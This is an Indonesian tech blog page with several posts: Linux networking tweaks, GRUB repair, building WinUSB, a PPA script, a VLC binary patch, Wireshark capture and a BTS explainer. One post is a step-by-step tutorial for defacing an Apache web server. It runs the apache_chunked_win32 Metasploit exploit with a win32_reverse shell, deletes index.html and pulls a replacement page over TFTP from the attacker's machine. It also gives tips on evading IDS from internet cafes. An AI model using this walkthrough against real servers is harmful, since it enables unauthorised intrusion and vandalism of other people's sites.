Powered By Blogger

Jumat, 25 Agustus 2017

Cara Menambah Kecepatan Internet di Kali Linux

Pada kesempatan saya akan memberi tutorial tentang bagaimana cara mempercepat koneksi di kali linux . oke saya akan memulai menjelakan tentang bagaimana cara mempercepat koneksi internet di kali linux. Berikut tutorial tersebut ..

Pertama anda install dnsmasq

Ketik di terminal anda : apt-get install dnsmasq

Lalu melakukan pengeditan konfigurasi,,

Dengan mngetik di terminal : nano /etc/dnsmasq.conf

kemudian tekan (ctrl+w) baris:~#listen-address= hapus hastaq(#)-nya dan isi value 127.0.0.1 (listen-address=127.0.01)
Lalu save untuk menyimpan perubahannya

Lalu edit setting dhclient.conf

Dengan cara ketik di terminal : nano /etc/dhcp/dhclient.conf
                                      Atau  : nano /etc/dchp3/dhclient.conf

Cari (ctrl+w) Baris:#supersede domain-name "fugue.com home.vix.com";
#prepend domain-name-servers 127.0.0.1;
request subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
dhcp6.name-servers, dhcp6.domain-search,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;
hapus kedua hastag (#)-nya yang berada di depan supersede dan prepend

Dan lalukan hal yang untuk save dan exit
sekarang buka resolv.conf untuk menambah nama server nya
dengan cara mengetik di terminal : nano /etc/resolv.conf

Tambahkan nameserver=127.0.0.1 pada baris pertama

ctrl+x lalu y dan tekan enter
lalu restart dnsmasq tadi..
dengan cara mengetik diterminal : /etc/init.d/dnsmasq restart

Selanjutnya kita edit sysctl.conf 
dengan cara mengetik diterminal : nano /etc/sysctl.conf
dan letakkan script ini pada barisan terakhir :

# increase TCP max buffer size setable using setsockopt() 
net.core.rmem_max = 16777216 
net.core.wmem_max = 16777216 
# increase Linux autotuning TCP buffer limits 
# min, default, and max number of bytes to use 
# set max to at least 4MB, or higher if you use very high BDP paths 
net.ipv4.tcp_rmem = 4096 87380 16777216 
net.ipv4.tcp_wmem = 4096 65536 16777216 
# don’t cache ssthresh from previous connection 
net.ipv4.tcp_no_metrics_save = 1 
net.ipv4.tcp_moderate_rcvbuf = 1 
# recommended to increase this for 1000 BT or higher 
net.core.netdev_max_backlog = 2500 
# for 10 GigE, use this, uncomment below 
# net.core.netdev_max_backlog = 30000 
# Turn off timestamps if you’re on a gigabit or very busy network 
# Having it off is one less thing the IP stack needs to work on 
#net.ipv4.tcp_timestamps = 0 
# disable tcp selective acknowledgements. 
net.ipv4.tcp_sack = 0 
#enable window scaling 
net.ipv4.tcp_window_scaling = 1 

jika sudah tekan ctrl+x lalu ya dan tekan enter 
dan terkhir ketik diterminal : sysctl -p 

Semoga bermanfaat !!!

Kamis, 24 Agustus 2017

Deface Menggunakan Metasploit Framework Tool

OK langsung aja yach? Berikut ini saya akan menjelaskan cara kerja tool Metasploit. Dengan tool ini kita akan memperoleh akses ke tingkat sistem pada Apache web server. Memperoleh shell yang memungkinkan kita mengupload file index.html kita sendiri, yang menjadi halaman default dari web server tersebut.

Catatan dibawah ini menunjukkan bagaimana perintah “show exploits” akan dilakukan saat berada pada prompt msf dari Metasploit. Berikut ini daftar exploit yang ada.

msf > show exploits

Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow

Jadi disini kita bisa melihat daftar exploit pada Metasploit (penulis: maaf saya ringkas saja). salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32

Sekarang ketik perintah exploit dibawah ini:

msf > use apache_chunked_win32

msf apache_chunked_win32 >

Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:

msf apache_chunked_win32 > show options

Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port
Target: Windows NT/2K Brute Force

msf apache_chunked_win32 >

Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini:

msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >

Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

msf apache_chunked_win32 > show payloads

Metasploit Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
msf apache_chunked_win32 >

Ehm! Pilihan yang bagus bukan? Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.

Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini sintak-nya:

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >

Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:


msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >

Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101[*] Starting Reverse Handler.[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...[*] Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>

Kita bisa melihat diatas bahwa sekarang kita memiliki command prompt pada direktori Apache itu sendiri. Ada satu opsi yang bisa kita gunakan dalam kasus ini; dimana target seandainya tidak menampilkan sistem operasi apa yang digunakan. Untuk mengetahuinya lakukan hal berikut ini:

msf apache_chunked_win32(win32_reverse) > show targets

Daftar target akan ditampilkan. Yang tinggal anda adalah menentukan target sebagai berikut;

msf apache_chunked_win32(win32_reverse) > set TARGET 1

Yang akan memasukkan target 1 dimana bila sistem operasinya adalah W2K Pro.

Sejauh ini kita telah melumpuhkan Apache web server, dan kita telah memiliki reverse shell. Dengan reverse shell dan akses ke sistem pada mesin guna melakukan manipulasi atau deface. Kita telah mengendalikan remote web server, jadi apa yang harus kita lakukan selanjutnya? Mari kita melakukan “dir” untuk melihat direktori yang ada, seperti contoh dibawah ini:


C:\Program Files\Apache Group\Apache>dir

dir

Volume in drive C has no label.

Volume Serial Number is C8E5-633B

Directory of C:\Program Files\Apache Group\Apache

12/12/2004 10:04a
.
12/12/2004 10:04a ..
12/15/2000 08:39a 14,583 ABOUT_APACHE
01/25/2001 03:12p 4,182 Announcement
01/30/2001 12:00a 20,480 Apache.exe
01/30/2001 12:00a 323,584 ApacheCore.dll
12/12/2004 10:04a bin
12/12/2004 10:04a cgi-bin
12/12/2004 10:04a conf
12/12/2004 10:04a htdocs
12/12/2004 10:04a 12/12/2004 10:04a include
06/05/2000 01:28p 41,421 KEYS
12/12/2004 10:04a lib
12/12/2004 10:04a libexec
01/15/2001 10:26a 2,885 LICENSE
12/12/2004 10:07a logs
12/12/2004 10:04a modules
12/12/2004 10:04a proxy
12/15/2000 09:04a 4,202 README-WIN.TXT
12/12/2004 10:04a src
11/06/2000 11:57a 1,342 WARNING-WIN.TXT
01/29/2001 11:23p 20,480 Win9xConHook.dll
01/29/2001 11:24p 40,960 xmlparse.dll
01/29/2001 11:24p 73,728 xmltok.dll

11 File(s) 547,847 bytes
14 Dir(s) 11,142,889,472 bytes free

C:\Program Files\Apache Group\Apache>

Ehm, baiklah akan saya katakan bagi para “web page defacer” untuk melihat isi direktori htdocs yang menyimpan file index.html. Jadi saya mengetik perintah “cd htdocs” lalu mengetik “dir”.


C:\Program Files\Apache Group\Apache\htdocs>dir
dir
Volume in drive C has no label.
Volume Serial Number is C8E5-633B
Directory of C:\Program Files\Apache Group\Apache\htdocs

12/18/2004     08:20a             .

12/18/2004      08:20a             ..

07/03/1996      01:18a            2,326 apache_pb.gif

01/19/2001      01:39p            1,354 index.html.en

12/12/2004      10:04a             manual

04/04/2000      10:26a            743 README.rus

                    3 File(s)                    4,423 bytes

                    3 Dir(s)                     11,143,004,160 bytes free


C:\Program Files\Apache Group\Apache\htdocs>

Jadi harap berhati-hati. Apa yang kita perlu lakukan adalah menghapus file tersebut (file index.html), dan setelah melakukannya, masukkan file index.html anda sendiri di tempat tersebut. Bagaimana cara melakukannya? Ada cara terbaik untuk mentrasfer file tersebut, dan teknik yang sering dilakukan oleh para hacker adalah menggunakan TFTP. Para attacker harus memiliki program TFTP server pada komputer mereka, kemudian menggunakan built-in TFTP client pada komputer target untuk melakukan transfer file.

Mari kita melihat kebelakang sebentar. Kita telah memperoleh akses ke shell pada web server melalui exploitasi apache_chunked yang dilakukan dengan Metasploit Framework. Tujuan kita adalah melakukan simulasi bagaimana pelaku deface melakukannya. Sejauh ini kita berada pada jalur yang benar. Saat mendapatkan akses ke web server, kita melihat isi daftar direktori dan melihat ada direktori htdocs yang didalamnya tersimpan file index.html. File inilah yang akan kita modifikasi dengan pesan deface kita sendiri. Dari sini kita akan menggunakan TFTP protokol diatas utuk mendapatkan file index.html yang kemudian akan kita kembalikan ke web server korban. Mari kita melakukannya!

Oops, hati-hati bung, jangan bertindak gegabah ada kemungkinan anda terdeteksi oleh firewall, atau IDS log dsb. Pokoknya hati-hati sajalah. Tapi kebanyakan dari para defacer melakukan aktifitas ini dari warnet dan tidak peduli akibatnya pada warnet yang komputernya mereka sewa.

Perhatikan dibawah ini adalah komputer penyerang yang menghapus file index.html pada web server korban. Hal ini harus dilakukan dengan perintah “del /F”. Para attacker harus menghapus file index.html sebelum mereka menyisipkan file index.html mereka sendiri melalui TFTP.


11:02:39.079422 IP (tos 0x0, ttl 64, id 50860, offset 0, flags [DF], length: 58) 192.168.1.102.4321 > 192.168.1.101.1028: P [tcp sum ok] 51364367:51364385(18) ack 813323178 win 10720
0x0000: 4500 003a c6ac 4000 4006 eff5 c0a8 0166 E..:..@.@......f
0x0010: c0a8 0165 10e1 0404 030f c20f 307a 53aa ...e........0zS.
0x0020: 5018 29e0 a0a4 0000 6465 6c20 2f46 2069 P.).....del./F.i
0x0030: 6e64 6578 2e68 746d 6c0a ndex.html.

Dari paket yang ditampilkan dibawah ini kita bisa memverifikasi bahwa mesin penyerang 192.168.1.102 menggunakan perintah tftp ke web server target;

tftp –i 192.168.1.102 GET index.html

Paket kedua menampilkan web server target menerima tftp request ini kepada tftp server penyerang. Mengingat penyerang ini memiliki reverse shell sebagaimana yang ditampilkan dibawah ini:

11:02:48.698588 IP (tos 0x0, ttl 64, id 50878, offset 0, flags [DF],_

length: 77) 192.168.1.102.4321 > 192.168.1.101.1028: P [tcp sum ok]_

51364389:51364426(37) ack 813323812 win 10720



0x0000: 4500 004d c6be 4000 4006 efd0 c0a8 0166 E..M..@.@......f

0x0010: c0a8 0165 10e1 0404 030f c225 307a 5624 ...e.......%0zV$

0x0020: 5018 29e0 0c3c 0000 7466 7470 202d 6920 P.)..<..tftp.-i.

0x0030: 3139 322e 3136 382e 312e 3130 3220 4745 192.168.1.102.GE

0x0040: 5420 696e 6465 782e 6874 6d6c 0a T.index.html.



11:02:48.699161 IP (tos 0x0, ttl 128, id 117, offset 0, flags [DF],_

length: 77) 192.168.1.101.1028 > 192.168.1.102.4321: P [tcp sum ok]_

813323812:813323849(37) ack 51364426 win 17443



0x0000: 4500 004d 0075 4000 8006 761a c0a8 0165 E..M.u@...v....e

0x0010: c0a8 0166 0404 10e1 307a 5624 030f c24a ...f....0zV$...J

0x0020: 5018 4423 f1d3 0000 7466 7470 202d 6920 P.D#....tftp.-i.

0x0030: 3139 322e 3136 382e 312e 3130 3220 4745 192.168.1.102.GE

0x0040: 5420 696e 6465 782e 6874 6d6c 0a T.index.html.




ada dua paket data yang telah melakukan konfirmasi tftp transfer yang diminta. Silakan lihat catatan transfer data halaman index.html anda sendiri ke web server korban.

11:02:48.834306 IP (tos 0x0, ttl 64, id 26457, offset 0, flags [DF],_

length: 544) 192.168.1.102.1024 > 192.168.1.101.1030: [udp sum ok]_

UDP, length: 516



0x0000: 4500 0220 6759 4000 4011 4d58 c0a8 0166 E...gY@.@.MX...f

0x0010: c0a8 0165 0400 0406 020c 3502 0003 0001 ...e......5.....

0x0020: 3c21 444f 4354 5950 4520 6874 6d6c 2050 0x0030: 5542 4c49 4320 222d 2f2f 5733 432f 2f44 UBLIC."-//W3C//D

0x0040: 5444 2048 544d 4c20 342e 3031 2054 7261 TD.HTML.4.01.Tra

0x0050: 6e73 6974 696f 6e61 6c2f 2f45 4e22 3e0a nsitional//EN">.

0x0060: 3c68 746d 6c3e 0a3c 6865 6164 3e0a 2020 ....

0x0070: 3c74 6974 6c65 3e69 6e64 6578 2e68 746d ...

0x00a0: 723e 0a3c 2f68 323e 0a3c 6831 3e3c 6272 r>.

.

0x00b0: 3e0a 3c2f 6831 3e0a 3c68 313e 3c62 723e >.

.

0x00c0: 0a3c 2f68 313e 0a3c 6831 3e59 6f75 2068 .

.

Situs.i 0x00d0: 6176 6520 6a75 7374 2062 6565 6e20 6f77 ni.telah.di.defa 0x00e0: 6e65 6420 6279 2061 6c74 2e64 6f6e 3c2f ce.oleh.NamaAnda…



Kemudian perhatikan paket data terakhir ini menyatakan transfer halaman index.html telah berhasil dilakukan.

11:02:48.847478 IP (tos 0x0, ttl 128, id 121, offset 0, flags [DF],_
length: 98) 192.168.1.101.1028 > 192.168.1.102.4321: P [tcp sum ok]_
813323849:813323907(58) ack 51364426 win 17443


0x0000: 4500 0062 0079 4000 8006 7601 c0a8 0165 E..b.y@...v....e
0x0010: c0a8 0166 0404 10e1 307a 5649 030f c24a ...f....0zVI...J
0x0020: 5018 4423 fa01 0000 5472 616e 7366 6572 P.D#....Transfer
0x0030: 2073 7563 6365 7373 6675 6c3a 2036 3736 .successful:.676
0x0040: 2062 7974 6573 2069 6e20 3120 7365 636f .bytes.in.1.seco
0x0050: 6e64 2c20 3637 3620 6279 7465 732f 730d nd,.676.bytes/s.
0x0060: 0d0a ..

Deface telah dilakukan, dan itulah yang biasanya dilakukan oleh para defacer. Adakalanya para penyerang ini melakukan hal-hal yang lebih buruk lagi seperti menginstal rootkit, ftp server atau content yang tidak diinginkan. Saran saya, jika web server anda terdeface, maka yang harus anda lakukan adalah memformat hard disk anda karena kita tidak tahu apa yang telah dilakukan orang-orang ini pada web server anda. Sekedar mengganti halaman web yang terdeface tidaklah cukup.

Oh Iya, saya hampir lupa! Kira-kira seperti apa yach halaman web yang kita deface tadi? Coba anda perhatikan gambar dibawah ini:



nah ternyata mendeface web server itu relatif mudah bukan? Apa yang harus dilakukan adalah menemukan celah keamanan pada program web server seperti Apache. Selanjutnya, melakukan coding untuk mengeksploitasinya. Hmm… orang-orang jenis inilah yang disebut hacker dengan kemampuan melakukan riset dan sangat berbakat. Orang-orang seperti HDM dan spoonm yang telah meluangkan waktunya guna mengembangkan Metasploit Framework agar kita dapat mempelajarinya.

Kamis, 27 Juli 2017

Cara Mengembalikan Grub Windows Setelah Hapus Dual boot Linux

Assalamualikum Wr.Wb :)
maaf kawan baru posting kali ini ane 
langsung aja sekarang bagaimana cara untuk mengembalikan grub yang telah di hapus setelah dual boot tenang jangan panik :) 
:) selalu ada cara :)

  • Berawal dari saya hapus partisi linux Ubuntu di laptop, maka grub linux akan secara otomatis hilang. Jadi saat komputer booting yang tadinya langsung mengarah ke grub linux bukan ke grub windows sedangkan grub linux sudah hilang, maka otomatis akan muncul error.
grub error

Untuk mengembalikan grub windows, caranya seperti ini:

  1. Sediakan CD OS yang digunakan. Kebetulan saya memakai Windows 8
  2. Booting dari CD, setelah keluar jendela install pilih Repair Windows.
  3. Pilih konfigurasi lewat Command Prompt

Ketik perintah-perintah berikut:
  • bootrec.exe /fixmbr lalu Enter.
  • bootrec.exe /fixboot lalu Enter.
5. Restart Laptop.
Selesai.

Senin, 17 Juli 2017

Cara Install Winusb di Ubuntu 16.04 (Source Code)

WinUSB adalah salah satu tool yang memungkinkan kita merubah flashdisk atau usb stick menjadi windows intaller dari iso, image atau DVD. Saat ini belum ada update dari WinUSB terkait versi aplikasi tersebut untuk repository Ubuntu 16.04. Kita bisa mengakalinya dengan cara install WinUSB di Ubuntu 16.04 melalui compile source code.

Persiapan Install WinUSB

Pertama yang kita lakukan adalah, menginstall beberapa program pendukung untuk melakukan compile dan mendapatkan soruce code WinUSB, ketikkan perintah berikut.
sudo apt-get install gcc build-essential libwxbase3.0-dev libwxgtk3.0-dev
wget ftp://ftp.ru.debian.org/gentoo-distfiles/distfiles/winusb-1.0.11.tar.gz
Extract file tar WinUSB, dengan cara berikut.
tar zxf winusb-1.0.11.tar.gz
 
Setelah berhasil extract, buka folder “src” dan jalankan perintah berikut.
cd winusb*/src
sed -i -- 's#wxStandardPaths().GetInstallPrefix()#wxStandardPaths::Get().GetInstallPrefix()#g' findFile.cpp
sed -i -- 's#wxStandardPaths().GetDataDir()#wxStandardPaths::Get().GetDataDir()#g' findFile.cpp

Compile dan Install WinUSB 1.0.11

Sekarang saatnya untuk compile paket source code, setelah berhasil hapus installer WinUSB.
cd ..
./configure
make
sudo make install
cd ..
rm -rf winusb-1.0.11
Setelah melakukan dengan benar beberapa langkah diatas, seharusnya sekarang kita sudah bisa menjalankan aplikasi WinUSB.
sudo winusbgui

winusb_1-700x379 

Kesimpulan Install WinUSB

Jika terjadi error pada saat compile source code atau aplikasi WinUSB tidak berjalan dengan semestinya seperti yang diharapkan, coba untuk membukan diskusi dengan cara berkomentar pada pembahasan ini.

Cara add PPA dengan Install "add-apt-repository" di Kali linux

Apa itu PPA ??

PPA (Personal Package Archive) adalah penyedia repositori buatan pihak ketiga di Launchpad yang dapat anda gunakan untuk menginstal (upgrade) paket yang tidak tersedia dalam repository Linux resmi. Biasanya ini sudah ada di Ubuntu, namun lain halnya dengan Kali Linux yang harus kita instalkan terlebih dahulu yaitu dengan menginstall "add-apt-repository". Berikut caranya :

1. Install Python

#apt-get install python-software-properties
2. Next, kita install apt-file

#apt-get install apt-file

3. Update apt-file
#apt-file update

4. Cek apt-file update 
#apt-file search add-apt-repository

5. Buat file add-apt-repository di /usr/sbin/
#cd /usr/sbin/
/usr/sbin#nano add-apt-repository

or

#nano /usr/sbin/add-apt-repository

kemudian masukkan script berikut :
#!/bin/bash
if [ $# -eq 1 ]
NM=`uname -a && date`
NAME=`echo $NM | md5sum | cut -f1 -d" "`
then
  ppa_name=`echo "$1" | cut -d":" -f2 -s`
  if [ -z "$ppa_name" ]
  then
    echo "PPA name not found"
    echo "Utility to add PPA repositories in your debian machine"
    echo "$0 ppa:user/ppa-name"
  else
    echo "$ppa_name"
    echo "deb http://ppa.launchpad.net/$ppa_name/ubuntu oneiric main" >> /etc/apt/sources.list
    apt-get update >> /dev/null 2> /tmp/${NAME}_apt_add_key.txt
    key=`cat /tmp/${NAME}_apt_add_key.txt | cut -d":" -f6 | cut -d" " -f3`
    apt-key adv --keyserver keyserver.ubuntu.com --recv-keys $key
    rm -rf /tmp/${NAME}_apt_add_key.txt
  fi
else
  echo "Utility to add PPA repositories in your debian machine"
  echo "$0 ppa:user/ppa-name"
fi
Simpan dan keluar.
6. Ubah permission file di atas dengan chmod dan chwon
7. Tes memasukkan repository ppa dengan "add-apt-repository"
Semoga Bermanfaat.. :D

Mengatasi Vlc Tidak Bisa Di Buka Di Kali Linux

Cara Mengatasi Vlc Tidak Bisa Di Buka Di Kali Linux.

sebuah video player sangat penting dan harus ada dalam sebuah komputer, untuk menonton tentunya.
untuk Operation System (OS) yang satu ini mungkin kamu sering menemui kendala tentang Video Player tertama VLC ini. di versi sebelum 2.0 ini mungkin vlc harus diinstall dulu. istimewanya di versi terbaru kali linux 2.0 ini Vlc sidah terinstall. dan yang paling istimewanya lagi Vlc tidak bisa di buka tanpa harus mengoprek terlebih dahulu.
nah bagaimana cara fix Vlc yang tidak mau dibuka dan menampilkan pesan saat diklik. langsung saja ke tutorialnya.
buka terminal kali linux 2.0 kamu dan ketikan perintah di bawah diterminal untuk ngebackup file asli


cp /usr/bin/vlc /usr/bin/vlc-backup berfungsi untuk backup


kemudian ketikan lagi perintah di bawah di terminal kali linux kamu


needle=$(objdump -d /usr/bin/vlc | grep euid | tail -1 | awk '{print "\\x"$2"\\x"$3"\\x"$4"\\x"$5"\\x"$6;}')


ketikan lagi perintah di bawah di terminal kali linux kamu

sed -ir "s/$needle/\xb8\x01\x00\x00\x00/" /usr/bin/vlc

sekarang coba buka lagi Vlc  kamu

enjoy!!!

Paket Capture Menggunakan Wireshark di Linux

Di tulisan saya kali ini, saya akan mengulas sedikit tentang paket capture menggunakan Wireshark di Linux. Dimana Wireshark ini mengizinkan pengguna mengamati data dari jaringan yang sedang beroperasi atau dari data yang ada di disk, dan langsung melihat/mensortir data yang tertangkap, mulai dari informasi singkat dan rincian bagi masing-masing paket termasuk juga full headers dan porsi data sanggup diperoleh.      Selanjutnya yaitu mengenai paket capture, dimana paket capture ini adalah proses untuk merekam paket data yang lalu-lalang di jaringan komputer.  Misalkan pada protokol HTTP, terjadi komunikasi antara client dan server dalam sebuah layanan berbasis web. Komunikasi antarkeduanya itu memerlukan pertukaran data. kita dapat merekam, memfilter, menganalisis, beragam paket data dari beragam protokol yang lalu lalang di jaringan komputer menggunakan aplikasi yang dikhususkan itu, salah satu aplikasinya yaitu Wireshark.

  Baiklah saya akan menguraikan langkah-langkah untuk melakukan capture paket data pada jaringan komputer  menggunakan aplikasi Wireshark.

1. Buka aplikasi terminal pada Linux (khusus Linux), kemudian ketika sudo su untuk menjadi rootnya terlebih dahulu. Seperti pada gambar di bawah ini.


Gambar Sudo su
            Seperti biasanya, akan keluar capture seperti yang diatas. Artinya kita diminta untuk memasukkan password komputer. Silahkan dimasukkan terlebih dahulu (************). Setelah memasukkannya, maka kita telah menjadi root.
2. Kemudian ketik  apt-get install Wireshark. Dikarenakan aplikasi Wireshark di laptop kita belum ada, maka harus di install terlebih dahulu, dengan perintah tersebut.Selanjutnya, tekan enter atau ketik yes untuk continue.
Gambar Install aplikasi Wireshark  
3. Setelah menginstall aplikasi Wireshark, ketik kembali "Wireshark". Maka akan keluar capture seperti ini.
Gambar menjalankan Wireshark melalui terminal di LInux (sebagai root)
4. Setelah Wireshark tampil di layar komputer, pilihlah interface koneksi melalui opsi Capture --> Interface. Akan tampil beberapa pilihan, silahkan dipilih sesuai interface yang digunkan. Dalam hal ini saya memilik etho (kabel).
Gambar  memilih interface dan mengklik tombol start
5. Kemudian, sebelum menekan Start untuk memulai menampilkan paket data yang ada di jaringan, bukalah terlebih dahulu aplikasi web browser, lalu buka alamat apapun itu ( saya membuka alamat "Kampus Emerald Bali dan ITB). Lanjutkan dengan mengklik tombol start. Amatilah paket-paket data pada jaringan komputer yang ditampilkan di Wireshark saat Anda mengakses situs melalui aplikasi web browser.
   
Gambar Proses Capture paket data pada Wireshark di LInux
6. Selain melakukan capture paket data, kita juga dapat melakukan Filtering dari paket data yang kita capture tersebut. Filtering paket data dapat dilakukan berdasarkan protokol yang digunakan. Namun, sebelum melakukan Filtering, kita harus menghentikan sementara (pause) aplikasi yang sedang berjalan agar memudahkan proses Filtering. 
7. Dalam pengujian ini kita akan memfilter paket-paket data dari protokol HTTP dan dari protokol TCP. Ada dua cara melakukan filter. Pertama, ketik langsung di bagian kolom filter (pojok kiri atas) kemudian pilih tombol Apply di bagian kanan. Atau cara kedua yaitu melalui menu Capture --> Option. Saya menggunakan cara yang kedua. 
8. Berikut ini adalah pengujian filtering untuk paket-paket data dari protokol TCP
   
Gambar memilih Option
Gambar Filter protokol TCP (Interface etho)
Gambar Filter protokol TCP (Interface etho)
9. Berikut adalah pengujian Filtering untuk paket-paket data dari protokol HTTP (Hyper Text Transfer Protocol) untuk akses layanan berbasis web.
 
Gambar Filter protokol HTTP (Interface etho)
   Apabila Anda telah selesai melakukan proses capture paket data menggunakan Wireshark, Anda dapat menghentikan proses capture dan menyimpan hasil capture jika di kehendaki.
Gambar Opsi untuk menyimpan hasil capture paket data di Wireshark pada LInux

Apa itu Base Transceiver Station (BTS)? Mari Cari Tahu di Sini

Mungkin Anda sering mendengar nama BTS, ya BTS yang merupakan singkatan dari Base Transceiver Station ini merupakan komponen jaringan dai sistem komunikasi mobile yang menerima dan mengirim sinyal. Sebuah BTS dikendalikan oleh pengontrol base station dan fungsinya memfasilitasi komunikasi nirkabel antara user equipment (UE) /peralatan pengguna dan jaringan. UE /UES merupakan perangkat yang digunakan pengguna misalnya ponsel, telepon WLL, komputer dengan aktivitas internet nirkabel, WiFi dan WiMAX gadget.
Masyarakat Indonesia sering menyebut Base Transceiver Station (BTS) sebagai menara seluler tetapi ada juga yang menyebutnya sebagai SUTET meskipun sangat berbeda. Rasanya kurang tepat jika BTS disebut sebagai SUTET, karena SUTET (Saluran Udara Tegangan Ekstra Tinggi) merupakan penyalur energi listrik yang jauh dari pusat pembangkitnya menuju pusat-pusat beban sehingga penyaluran enegi listrik menjadi lebih efisien, SUTET biasanya dibangun oleh PLN sedangkan BTS oleh para penyedia layanan telekomunikasi.
Istilah lain dari Base Transceiver Station adalah radio base station (RBS, node B (pada jaringan 3G atau juga hanya base station (BS) saja. Meskipun BTS berlaku untuk semua standar komunikasi nirkabel, pada umumnya BTS terkait dengan teknologi komunikasi mobile seperti GSM dan CDMA.

Dalam hal ini, sebuah Base Transceiver Station merupakan bagian dari perkembangan base station subsistem (BSS) untuk sistem manajemen. BTS juga mungkin memiliki peralatan untuk mengenkripsi dan mendekripsi komunikasi, seperti alat penyaringan spektrum (band pass filter), antena dan lain sebagainya sehingga dianggap sebagai komponen BTS, karena komponen-kompone tersebut memiliki andil dalam memfasilitasi fungsi BTS.
Umumnya, Base Transceiver Station memiliki beberapa transceiver* (TRXs) yang memungkinkan BTS untuk melayani beberapa frekuensi berbeda dengan sektor yang berbeda pula dari sel (dalam kasus sectorised BTS). Sebuah BTS dikendalikan oleh pengontrol base station melalui fungsi base station control (BCF).
BCF merupakan unit berlainan yang tergabung dalam TRX di base station yang tersusun rapat. BCFmenyediakan koneksi operations dan maintenance (O & M) ke sistem manajemen jaringan /network management system (NMS), mengelola wilayah operasional TRX masing-masing serta menangani software dan koleksi alarm. Struktur dasar dan fungsi dari setiap BTS pada dasarnya sama terlepas dari teknologi nirkabel.
Base Transceiver Station memiliki kompononen-komponen penting sebagai berikut:
  • Transceiver (TRX)
  • Power Amplifier (PA)
  • Combiner
  • Duplexer
  • Antena
  • Alarm extension system
  • Control Function
  • Baseband receiver unit
Keragaman teknik
Untuk meningkatkan kualitas sinyal yang diterima, biasanya dua antena penerima yang digunakan ditempatkan pada jarak yang sama dengan multiple gelombang yang tidak seimbang (contoh 900MHz untuk panjang gelombang 30cm).
Teknik ini dikenal sebagai keragaman antena atau keragaman ruang, tujuannya untuk menghindari gangguan yang disebabkan oleh garis edar yang memudar. Antena dapat diberikan jarak horizontal ataupun vertikal. Jarak horisontal memerlukan instalasi yang lebih kompleks, tetapi membawa kinerja yang lebih baik.
Selain antena atau keragaman ruang, ada juga teknik keragaman lain seperti frekuensi /waktu keragaman, keragaman pola antena, dan keragaman polarisasi. Memisahkan aliran listrik dengan area tertentu dari sel, dikenal sebagai sektor, sehingga setiap bidang dapat dianggap sebagai satu sel baru.
